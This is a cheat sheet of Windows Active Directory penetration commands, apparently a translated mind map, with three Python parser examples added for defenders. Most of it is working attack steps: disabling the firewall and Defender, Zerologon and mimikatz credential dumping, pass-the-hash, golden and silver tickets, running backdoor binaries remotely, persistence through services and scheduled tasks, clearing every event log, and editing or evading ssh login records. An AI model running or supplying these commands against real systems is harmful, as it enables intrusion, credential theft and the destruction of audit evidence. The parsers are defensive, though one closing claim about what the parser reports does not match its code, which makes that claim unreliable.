Common commands for intranet penetration
A complete reference for network security operations and emergency response, covering information collection, file search, remote access, scheduled tasks, port forwarding, backdoors, tools, information acquisition, trace cleaning, and more.
Edited at 2024-03-22 14:57:47
Information collection
net commands
net time /domain
net group "domain admins" /domain
net group "domain controllers" /domain
net user administrator /domain
nltest /domain_trusts                    // Get domain trust relationships
nltest /dclist:
net share
net view \\domainip
net view /domain                         // View the domain/workgroup list
net view /domain:secwing                 // View the list of computers in the secwing domain
net config workstation                   // Query which domain this machine belongs to
netstat -ano | findstr
net accounts                             // View the local password policy
set                                      // View environment variables
nbtstat -A ip                            // NetBIOS query
whoami /all
qwinsta                                  // View login status
query user                               // View the administrator's latest login time
nltest /domain_trusts                    // Get domain trust information
taskkill /f /im
tasklist /svc                            // View processes with their services
tasklist /S ip /U domain\username /P /V  // View the remote computer's process list
tracert IP                               // Route tracing
route print                              // Print the routing table
arp -a                                   // List all active IP addresses in this network segment
arp -s ip MAC                            // Bind a MAC to an IP address
arp -d ip                                // Unbind a MAC from an IP address
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /ve   // Get recent mstsc login records
setspn -Q */*                            // SPN list
File search
findstr finds files containing passwords
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
dir: find file locations
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
Remote
Turn off firewall
netsh firewall set opmode mode=disable
netsh advfirewall set allprofiles state off
Stop Windows Defender
net stop windefend
Restore firewall to default
netsh firewall reset
Open port 3389
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
CVE-2020-1472
privilege::debug
sekurlsa::logonpasswords
lsadump::zerologon /target:ip /account:ADC1$
lsadump::zerologon /target:ip /account:ADC1$ /exploit
lsadump::dcsync /domain:DC2.com /dc:DC2 /user:administrator /authuser:DC2$ /authdomain:DC2 /authpassword:"" /authntlm
sekurlsa::pth /user:administrator /domain:. /rc4:161cff084477fe596a5db81874498a24
IPC
net use \\ip\ipc$ password /user:domain\user
net use \\IP\ipc$ password /user:username@domain
copy putty.exe \\192.168.0.100\admin$
net time \\192.168.0.100
at \\192.168.0.100 19:45 putty.exe
net use Z: \\192.168.0.100\c$            Map the target's C drive to a local drive letter
dir \\192.168.17.138\c$
copy test.exe \\192.168.17.138\c$
net use * \\192.168.0.100 /del
net use * /del /y
net use * /del
net use                                  View sessions
net session
WMI
wmic qfe get hotfixid                              // View installed patches (very practical)
wmic qfe list full /format:htable > hotfixes.htm   // Detailed patch installation report
wmic qfe                                           // Query patch information and the download address provided by Microsoft
ping hostname                                      // Display the IP of a host name
wmic share get name,path                           // View the paths pointed to by SMB shares
wmic nteventlog get path,filename,writeable        // Query the storage location of system log files
wmic service list brief                            // View services
wmic process list brief                            // View processes
wmic startup list brief                            // View startup program information
wmic product list brief                            // View installed programs and versions (vulnerability exploitation clues)
wmic startup list full                             // Identify programs started at boot
wmic process where (description="mysqld.exe") >> mysql.log   // Get a program's installation path
wmic /node:ip /user:user /password:pwd process call create c:\backdoor.exe
wmic /node:ip /user:user /password:pwd process where name="cmd.exe" call terminate
wmic /node:10.10.10.11 /user:administrator /password:1qaz@WSX process call create "cmd.exe /c ipconfig>c:\result.txt"
WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"
wmic /node:ip /user:user /password:pwd process where name="cmd.exe" get CommandLine
Scheduled Tasks
AT command (deprecated since Windows Server 2012)
Establish a net use connection:           net use \\192.168.1.100\c$ 1qaz@WSX /user:domain\user
Copy the bat file to the remote computer: copy exec.bat \\192.168.1.100\c$\windows\debug\exec.bat
View the remote computer's time:          net time \\192.168.1.100
Create a remote scheduled task:           at \\192.168.1.100 21:52 c:\windows\temp\exec.bat
View the remote scheduled task list:      at \\192.168.1.100
Schtasks
Create task:   schtasks /create /s ip /u administrator /p password /ru "system" /tn adduser /sc DAILY /tr c:\windows\debug\add.bat /f     (/tn = task name, /sc = schedule)
Run task:      schtasks /run /s ip /u administrator /p password /tn adduser /i
               schtasks /run /tn update /s 10.10.10.137 /u test\administrator /p 1qaz@WSX
Delete task:   schtasks /delete /s ip /u administrator /p password /tn adduser /f
SC (service control) command, built into Windows; used together with file sharing to create services remotely
Establish the IPC connection and run sc:
net use \\192.168.17.138\c$ "admin123" /user:pt007
net use
dir \\192.168.17.138\c$
copy test.exe \\192.168.17.138\c$
Create service:
sc \\remote_ip create service_name binpath= c:\backdoor.exe
sc \\10.10.10.10 create update binpath= c:\programdata\a.bat
Start service:
sc \\remote_ip start service_name
sc \\10.10.10.10 start update
Stop service:
sc \\remote_ip stop service_name
sc \\10.10.10.10 stop update
Delete service:
sc \\remote_ip delete service_name
sc \\10.10.10.10 delete update
Port forwarding
Netsh port forwarding
netsh firewall show config                         // View the firewall policy
netsh firewall show state                          // View the firewall state
Enable port forwarding:
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
Open the firewall:
netsh advfirewall firewall add rule name="firewallname" protocol=TCP dir=in localip=ip localport=port action=allow
Show all forwarding rules:
netsh interface portproxy show all
Delete a forwarding rule:
netsh interface portproxy delete v4tov4 listenport=port listenaddress=ip
Reset:
netsh interface portproxy reset
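Added example (not part of the original mind map): a reviewer-side parser for the output of `netsh interface portproxy show all`, the command listed above for showing all forwarding rules. It turns the table into structured rules and flags the ones a defender would want to explain: rules listening on every interface, and rules that forward to remote-administration ports. The sample output, the address/port values and the list of "sensitive" ports are constructed for this example and are assumptions, not captured from a real host.

```python
import re

# Constructed sample of `netsh interface portproxy show all` output; it is not
# captured from a real host, and the addresses/ports are made up for the example.
SAMPLE_PORTPROXY_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         8080        10.0.0.5        3389
127.0.0.1       2222        192.168.1.20    8443

Listen on ipv6:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               443         10.0.0.9        443
"""

# Section header, e.g. "Listen on ipv4:             Connect to ipv4:"
SECTION_RE = re.compile(r"^\s*Listen on (ipv[46]):\s+Connect to (ipv[46]):\s*$")
# Rule row: listen address, listen port, connect address, connect port
RULE_RE = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")

# Listen addresses that accept connections from any interface
WILDCARD_LISTEN = {"0.0.0.0", "*", "::"}
# Destination ports of remote-administration services (assumed list for this
# example; extend it to match your environment)
SENSITIVE_PORTS = {22, 445, 3389, 5985, 5986}


def parse_portproxy(text):
    """Parse `netsh interface portproxy show all` output into a list of rule dicts."""
    rules = []
    listen_family = connect_family = None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            listen_family, connect_family = m.group(1), m.group(2)
            continue
        m = RULE_RE.match(line)
        if m and listen_family:
            rules.append({
                "listen_family": listen_family,
                "listen_address": m.group(1),
                "listen_port": int(m.group(2)),
                "connect_family": connect_family,
                "connect_address": m.group(3),
                "connect_port": int(m.group(4)),
            })
    return rules


def review_portproxy(rules):
    """Return (rule, reasons) pairs for rules that deserve a closer look."""
    findings = []
    for rule in rules:
        reasons = []
        if rule["listen_address"] in WILDCARD_LISTEN:
            reasons.append("listens on all interfaces")
        if rule["connect_port"] in SENSITIVE_PORTS:
            reasons.append("forwards to remote-administration port %d" % rule["connect_port"])
        if reasons:
            findings.append((rule, reasons))
    return findings


if __name__ == "__main__":
    for rule, reasons in review_portproxy(parse_portproxy(SAMPLE_PORTPROXY_OUTPUT)):
        print("%s:%d -> %s:%d  (%s)" % (rule["listen_address"], rule["listen_port"],
                                        rule["connect_address"], rule["connect_port"],
                                        "; ".join(reasons)))
```

Port proxy rules survive reboots because netsh persists them in the registry under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, so when reviewing a host it is worth checking that key as well as the live `show all` output.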
SSH forwarding
1. ssh local port forwarding:   ssh -L [<local host>:]<local port>:<remote host>:<remote port> <ssh hostname>
2. ssh reverse port forwarding: ssh -R [<local host>:]<local port>:<remote host>:<remote port> <ssh hostname>
3. ssh SOCKS proxy:             ssh -D [<local host>:]<local port> <ssh hostname>
Backdoor
Golden ticket
Conditions and requirements for a golden ticket:
1. Domain name
2. SID of the domain (whoami /user)
3. NTLM password hash of the domain's krbtgt account
4. Forged user name
sekurlsa::pth /user:administrator /domain:"GOD.org" /ntlm:61465a991b168727b65b3644aab823cd     (login user, domain, NTLM hash value; a CMD window pops up)
Check permissions first:
dir \\OWA.GOD.org\c$                       [view the domain controller's C drive]
dir \\DC.zkaq.cn\c$
lsadump::dcsync /user:krbtgt /domain:      Get the krbtgt password [mimikatz impersonates a domain controller and requests the account and password information from the target domain controller]; extract the SID and NTLM hash from the output
kerberos::golden /admin:administrator /domain:god.org /sid:S-1-5-21-2952760202-13539024381784089 /krbtgt:58e91a5886513AB2224312314000 61 /ticket:Administrator.kiribi     [generate ticket]
kerberos::ptt administrator.kiribi          [load ticket]
Inject the golden ticket directly:
kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:domainsid /krbtgt:hash /ptt
kerberos::purge                             clears tickets
privilege::debug
Wait for the administrator to log in to obtain the password:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # misc::memssp
Injected =)
mimikatz # exit
Silver ticket
View the current user's SID:       whoami /user
Get the target computer's hash:    sekurlsa::logonpasswords (or via the CVE-2020-1472 vulnerability)
Generate the silver ticket:
kerberos::golden /sid:domainsid /domain:test.local /ptt /id:<fake user ID> /target:mdc.test.local /service:cifs /rc4:<target computer hash> /user:<fake username>
Tools
dsquery
dsquery.exe user -limit 0                  # Query user object information
dsquery.exe group -limit 0                 # Query group object information
dsquery.exe ou -limit 0                    # Query OU object information
dsquery user domainroot -limit 65535 && net user /domain          // List all user names in the domain
dsquery server -domain supre.com | dsget server -dnsname -site    // Find all domain controllers in the domain and display their DNS host names and site names
dsquery contact                            // Find contacts in the directory
dsquery subnet                             // List the network segments defined in this domain
dsquery group && net group /domain         // List the groups in this domain
dsquery ou                                 // List the organizational units in this domain
dsquery server && net time /domain         // List the domain controllers in this domain
dsquery site -o rdn                        // Find all site names in the domain
dsquery group dc=GOD,dc=org | more         // Find all groups in the dc=GOD,dc=org domain
dsquery.exe computer                       # Find computers in the directory
dsquery.exe site                           # Find sites in the directory
dsquery.exe server                         # Find AD DC/LDS instances in the directory
AdFind
AdFind -sc dclist                                   # List domain controller names
AdFind -sc computers_active                         # Query the online computers in the current domain
AdFind -sc computers_active name operatingSystem    # Query the online computers in the current domain (only name and operating system)
AdFind.exe -sc computers_active name dnshostname    # Query the active hosts in the domain and output host name and DNS name
AdFind -f "objectcategory=computer"                 # Query all computers in the current domain
AdFind -f "objectcategory=computer" name operatingSystem    # Query all computers in the current domain (only name and operating system)
AdFind -users name                                  # Query all users in the domain
AdFind -sc gpodmp                                   # Query all GPOs
AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:*          # Query the detailed information of all users in the domain
AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test       # Query the details of a specific user in the domain
AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test mail  # Query a specific attribute (mail) of a specific user
AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -dn      # Query the DN of all users in the domain
AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -c       # Query the number of users in the domain
AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:*          # Query the detailed information of all groups in the domain
AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:*Admin     # Query the details of all groups whose name contains Admin
AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc o:*          # Query the details of all OUs in the domain
AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc c:*          # Query the details of all computers in the domain
AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc s:*          # Query the details of all sites in the domain
psexec / paexec
psexec.exe -accepteula \\10.10.10.137 -u test\administrator -p 1qaz@WSX -i cmd.exe
psexec.exe -accepteula -i -s -d cmd
paexec.exe \\ip -u domain\user -p pwd cmd.exe -noname
net use \\ip pwd /u:domain\user
paexec.exe \\ip cmd.exe
netsh winhttp show proxy                   // View the proxy settings
WinRM port multiplexing (reusing the web port to enter the network)
winrm quickconfig -q
winrm s winrm/config/Client @{TrustedHosts="*"}
Add a listener on port 80:
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
Change port 5985 to 80:
winrm set winrm/config/listener?Address=*+Transport=HTTP @{Port="80"}
Connect over the modified WinRM (web) port:
winrs -r:http://xx -u:DC20\administrator -p:1qaz@WSX cmd
Information acquisition
powerview
Load:    Import-Module .\PowerView.ps1
Query:   Get-DomainGroup      # Query group details
         Get-DomainOU         # Query OU details
         Get-DomainUser       # Query user details
psloggedon.exe
psloggedon.exe username
-l   only display locally logged-in users, not users logged in over the network
-x   do not display the login time
To display the user currently logged in to a remote machine: psloggedon \\<remote machine ip>
Add -accepteula the first time to suppress the copyright banner.
netsess.exe
netsess.exe \\PRIMARY
PVEFindADUser.exe
PVEFindADUser.exe -current
wevtutil
wevtutil epl Security C:\log.evtx /q:"*[EventData[Data[@Name='LogonType']='3'] and System[(EventID=4624) and TimeCreated[timediff(@SystemTime) <= 259200000]]]" /r:<remote computer IP> /u:<username> /p:<password>
# epl                     export log
# Security                the Security log
# C:\log.evtx             location of the exported log; when exporting remotely, the file is written on the remote computer
# /q:                     the log query statement (XPath)
# System[(EventID=4624)   event ID 4624, i.e. a successful user logon
# EventData[Data[@Name='LogonType']='3']   logon type 3, i.e. a network logon
# TimeCreated[timediff(@SystemTime) <= 259200000]   only events from the last 259200000 milliseconds (72 hours) are exported; change the number to suit your needs
# When exporting locally, the /r option is not needed.
# For more wevtutil usage see its help documentation; it can also be used to delete Windows logs.
logparser
LogParser.exe -i:EVT -o:CSV "SELECT DISTINCT TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) AS USERNAME, TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) AS SOURCE_IP FROM C:\*.evtx" > C:\log.csv
# -i:EVT                   the input format is evtx
# -o:CSV                   the output format is csv
# The content in double quotes is the query statement
# DISTINCT                 deduplicate the results
# TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) AS USERNAME      parse the user name from the logon event
# TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) AS SOURCE_IP    parse the logon source address from the logon event
# *.evtx                   processes multiple log files at the same time
# The details of the logon log can be viewed with:
LogParser.exe -i:EVT -o:DATAGRID "SELECT * FROM *.evtx"
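Added example, not from the original mind map: the wevtutil query above and the LogParser query above implement the same audit question, "which accounts logged on over the network recently, and from where". This Python block applies the identical predicate (event 4624, LogonType 3, TimeCreated within 259200000 ms) to Windows event XML and then produces the distinct upper-cased (USERNAME, SOURCE_IP) pairs that the LogParser statement outputs. It reads the named Data elements (TargetUserName, IpAddress) rather than the pipe-separated Strings tokens 5 and 18; the sample events, the fixed reference time and the `make_event` helper are constructed for this example and are assumptions, not real log data.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone, timedelta

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
WINDOW_MS = 259200000   # the timediff bound used in the wevtutil query (72 hours)


def make_event(event_id, logon_type, user, ip, when):
    """Build a minimal Windows event XML record (constructed sample input, not real data)."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        '<System><EventID>%d</EventID>'
        '<TimeCreated SystemTime="%s"/></System>'
        '<EventData>'
        '<Data Name="TargetUserName">%s</Data>'
        '<Data Name="LogonType">%s</Data>'
        '<Data Name="IpAddress">%s</Data>'
        '</EventData></Event>'
    ) % (event_id, when.strftime("%Y-%m-%dT%H:%M:%S.%f0Z"), user, logon_type, ip)


def parse_system_time(value):
    """Parse a SystemTime attribute: ISO 8601 with up to 7 fractional digits and a 'Z' suffix."""
    base, _, frac = value.rstrip("Z").partition(".")
    dt = datetime.strptime(base, "%Y-%m-%dT%H:%M:%S")
    micro = int((frac + "000000")[:6]) if frac else 0
    return dt.replace(microsecond=micro, tzinfo=timezone.utc)


def event_data(root):
    """Map of EventData/Data@Name -> text."""
    return {d.get("Name"): (d.text or "") for d in root.iter(NS + "Data")}


def matches_query(root, now):
    """Same predicate as the wevtutil XPath: 4624, LogonType 3, created within WINDOW_MS of now."""
    event_id = int(root.find(NS + "System/" + NS + "EventID").text)
    created = parse_system_time(root.find(NS + "System/" + NS + "TimeCreated").get("SystemTime"))
    age_ms = (now - created).total_seconds() * 1000
    return event_id == 4624 and event_data(root).get("LogonType") == "3" and 0 <= age_ms <= WINDOW_MS


def count_matching(event_xmls, now):
    return sum(1 for x in event_xmls if matches_query(ET.fromstring(x), now))


def extract_network_logons(event_xmls, now):
    """Distinct (USERNAME, SOURCE_IP) pairs, upper-cased as in the LogParser query."""
    seen = set()
    for xml_text in event_xmls:
        root = ET.fromstring(xml_text)
        if matches_query(root, now):
            data = event_data(root)
            seen.add((data.get("TargetUserName", "").upper(), data.get("IpAddress", "").upper()))
    return sorted(seen)


# Fixed reference time and constructed events for the example
NOW = datetime(2024, 3, 22, 14, 57, 47, tzinfo=timezone.utc)
SAMPLE_EVENTS = [
    make_event(4624, "3", "alice", "10.0.0.7", NOW - timedelta(hours=5)),   # network logon, recent: kept
    make_event(4624, "2", "alice", "-", NOW - timedelta(hours=1)),           # interactive logon: wrong type
    make_event(4625, "3", "bob", "10.0.0.8", NOW - timedelta(hours=2)),      # failed logon: wrong event ID
    make_event(4624, "3", "bob", "10.0.0.8", NOW - timedelta(days=10)),      # older than 72 hours: dropped
    make_event(4624, "3", "bob", "10.0.0.8", NOW - timedelta(days=1)),       # kept
    make_event(4624, "3", "bob", "10.0.0.8", NOW - timedelta(days=2)),       # duplicate pair, collapsed by DISTINCT
]

if __name__ == "__main__":
    for user, ip in extract_network_logons(SAMPLE_EVENTS, NOW):
        print(user, ip)
```

Running the block prints two pairs: ALICE from 10.0.0.7 and BOB from 10.0.0.8; the interactive logon, the failed logon and the ten-day-old event are dropped exactly as the XPath predicate drops them.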
Trace cleaning
wevtutil
wevtutil el                               lists the names of all logs on the system
wevtutil cl system                        clears the System log
wevtutil cl application                   clears the Application log
wevtutil cl security                      clears the Security log
for /f "delims=" %j in ('wevtutil.exe el') do @wevtutil.exe cl "%j"      clears every log
Log files are stored under c:\windows\system32\winevt\logs\
Windows Defender
"C:\PROGRA~1\WINDOW~1\mpcmdrun.exe" -Restore -ListAll
powershell -Command Add-MpPreference -ExclusionPath "C:\tmp"
powershell -Command Add-MpPreference -ExclusionExtension ".java"
powershell -Command Add-MpPreference -ExclusionProcess "*.exe"
powershell -Command Get-MpPreference
ssh login information
/var/log/btmp      records all failed login attempts; view with the lastb command
/var/log/lastlog   records the last login time of every user on the system; view with the lastlog command
/var/log/wtmp      records the login and logout history of all users; view with the last command
/var/log/utmp      records the currently logged-in users; view with w, who, users and similar commands
/var/log/secure    records security-related log information
/var/log/messages  records information and error logs after system startup
The "Last login: <time> from <ip>" line shown when logging in over ssh is read from /var/log/lastlog; ~/.ssh/known_hosts is also relevant
sed can be used to replace entries:   sed -i 's/own ip/original ip/' /var/log/lastlog
Delete the lines carrying today's date: sed -i '/<today's date>/d' filename
Log in without being shown by w, who, last and similar commands:   ssh -T root@192.168.01 /bin/bash -i
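Added example (not from the original mind map): btmp, wtmp and utmp above share one binary record format, so a defender reviewing failed ssh logins without the `lastb` tool (or from a copied file) needs a parser for it. This block decodes the 384-byte struct utmp layout used by glibc on x86_64 Linux and counts failed attempts per source host. The sample file is constructed in the block with a small packing helper; the record type value and the "ssh:notty" line used for the sample rows are assumptions for the example, not taken from a real system.

```python
import struct
from collections import Counter
from datetime import datetime, timezone

# Layout of struct utmp as written by glibc on x86_64 Linux (384 bytes):
# ut_type, ut_pid, ut_line[32], ut_id[4], ut_user[32], ut_host[256],
# ut_exit (two shorts), ut_session, ut_tv (sec, usec), ut_addr_v6[4], padding.
UTMP = struct.Struct("<hxxi32s4s32s256shhiii4i20x")
assert UTMP.size == 384

UT_TYPES = {0: "EMPTY", 1: "RUN_LVL", 2: "BOOT_TIME", 3: "NEW_TIME", 4: "OLD_TIME",
            5: "INIT_PROCESS", 6: "LOGIN_PROCESS", 7: "USER_PROCESS",
            8: "DEAD_PROCESS", 9: "ACCOUNTING"}


def _cstr(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_utmp(data):
    """Decode every complete record in a utmp/wtmp/btmp byte string; a trailing partial record is ignored."""
    records = []
    for offset in range(0, len(data) - len(data) % UTMP.size, UTMP.size):
        (ut_type, pid, line, _ut_id, user, host, _term, _exit,
         _session, tv_sec, _tv_usec, *_addr) = UTMP.unpack_from(data, offset)
        records.append({
            "type": UT_TYPES.get(ut_type, str(ut_type)),
            "pid": pid,
            "line": _cstr(line),
            "user": _cstr(user),
            "host": _cstr(host),
            "time": datetime.fromtimestamp(tv_sec, tz=timezone.utc),
        })
    return records


def make_record(ut_type, pid, line, user, host, when):
    """Pack one constructed record (sample input for the example)."""
    return UTMP.pack(ut_type, pid, line.encode(), b"", user.encode(), host.encode(),
                     0, 0, 0, int(when.timestamp()), 0, 0, 0, 0, 0)


def attempts_by_host(records):
    """Count records per source host (in btmp every record is a failed attempt)."""
    return Counter(r["host"] for r in records)


# Constructed btmp contents: four failed ssh logins, three from one address.
# Type 7 (USER_PROCESS) and the "ssh:notty" line are assumed values for the sample.
T0 = datetime(2024, 3, 22, 6, 0, 0, tzinfo=timezone.utc)
SAMPLE_BTMP = b"".join([
    make_record(7, 4101, "ssh:notty", "root", "203.0.113.5", T0),
    make_record(7, 4102, "ssh:notty", "admin", "203.0.113.5", T0),
    make_record(7, 4103, "ssh:notty", "root", "203.0.113.5", T0),
    make_record(7, 4104, "ssh:notty", "test", "198.51.100.9", T0),
])

if __name__ == "__main__":
    for rec in parse_utmp(SAMPLE_BTMP):
        print(rec["time"].isoformat(), rec["type"], rec["user"], rec["line"], rec["host"])
    print(attempts_by_host(parse_utmp(SAMPLE_BTMP)))
```

Because the format is fixed-width binary, `sed` cannot edit these files meaningfully; an inconsistent or truncated record (file length not a multiple of 384, or a zeroed host field on an ssh line) is itself a sign that the file was tampered with, which is why this parser also reports how much of the file it could decode.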